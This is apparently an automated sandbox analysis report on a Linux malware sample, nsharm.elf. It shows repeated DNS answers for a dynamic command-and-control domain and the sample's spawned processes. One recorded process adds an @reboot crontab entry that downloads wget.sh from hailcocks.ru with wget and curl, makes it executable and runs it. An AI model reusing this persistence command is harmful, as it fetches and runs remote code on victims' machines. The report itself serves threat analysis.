                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:17:44.295861959 CEST217.160.70.42192.168.2.130x6b13No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:00.492328882 CEST202.61.197.122192.168.2.130x8eccNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:06.895849943 CEST185.181.61.24192.168.2.130xb026No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:12.777451038 CEST65.21.1.106192.168.2.130xdb27No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:44.504378080 CEST217.160.70.42192.168.2.130x5681No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:50.254956961 CEST80.152.203.134192.168.2.130xb781No error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:18:56.003783941 CEST168.235.111.72192.168.2.130xeeddNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn185.82.200.181A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn88.151.195.22A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn81.29.149.178A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn193.233.193.45A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn86.107.100.80A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn195.133.92.51A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn194.87.198.29A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn91.149.218.232A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn91.149.238.18A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn31.13.248.89A (IP address)IN (0x0001)false
                                                                            Oct 26, 2024 19:19:01.885994911 CEST217.160.70.42192.168.2.130x1feaNo error (0)kingstonwikkerink.dyn213.182.204.57A (IP address)IN (0x0001)false

                                                                            System Behavior

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/tmp/nsharm.elf
                                                                            Arguments:/tmp/nsharm.elf
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/tmp/nsharm.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/bin/sh
                                                                            Arguments:sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/bin/sh
                                                                            Arguments:-
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/bin/sh
                                                                            Arguments:-
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/usr/bin/crontab
                                                                            Arguments:crontab -l
                                                                            File size:43720 bytes
                                                                            MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/bin/sh
                                                                            Arguments:-
                                                                            File size:129816 bytes
                                                                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/usr/bin/crontab
                                                                            Arguments:crontab -
                                                                            File size:43720 bytes
                                                                            MD5 hash:66e521d421ac9b407699061bf21806f5

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/tmp/nsharm.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/tmp/nsharm.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                            Start time (UTC):17:16:57
                                                                            Start date (UTC):26/10/2024
                                                                            Path:/tmp/nsharm.elf
                                                                            Arguments:-
                                                                            File size:4956856 bytes
                                                                            MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1